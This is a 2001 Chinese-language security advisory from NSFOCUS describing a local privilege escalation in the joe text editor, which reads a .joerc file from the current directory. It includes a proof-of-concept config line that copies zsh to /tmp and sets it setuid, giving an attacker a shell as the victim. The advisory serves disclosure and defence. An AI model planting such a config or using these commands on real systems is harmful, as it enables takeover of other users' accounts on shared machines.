首页 -> 安全研究

安全研究

安全漏洞
Joe 配置文件处理漏洞

发布日期:2001-03-01
更新日期:2001-03-01

受影响系统:

Joseph Allen joe 2.8或者以前版本
  - FreeBSD
  - OpenBSD
  - Linux
描述:

Joe是一个Unix下常用的文本编辑器。它存在一个本地安全问题,可能导致攻击者
提升自己的权限。

Joe在使用自己的配置文件时,会依次从下列三个目录中读取:
./.joerc (CWD), $HOME/.joerc, /usr/local/lib/joerc

如果攻击者在某个目录下创建一个.joerc文件,当其他用户在此目录下执行joe来
编辑文件时,就会执行恶意配置文件中的命令。攻击者可能非法提升自己的权限。

<* 来源:WKIT SECURITY AB (advisories@wkit.com)
         http://www.wkit.com
*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


WKIT SECURITY AB (advisories@wkit.com)提供了下列测试代码:

将缺省的.joerc配置文件中的下列行:

  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
  >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
  改成:
  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
  >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod
  4755 /tmp/suid",rtn,retype

将其拷贝到/tmp目录或者其他拥有写权限的目录下。
则当另外一个用户在该目录下用joe编辑文件,并使用^[l来运行ispell时,就会
给攻击者提供一个suid shell.

建议:

临时解决方法:

NSFOCUS建议您不要在不可信目录下使用joe.

厂商补丁:

暂无。

OpenBSD 在1998/12/22的ports tree中已经解决了这个问题。


浏览次数:4326
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障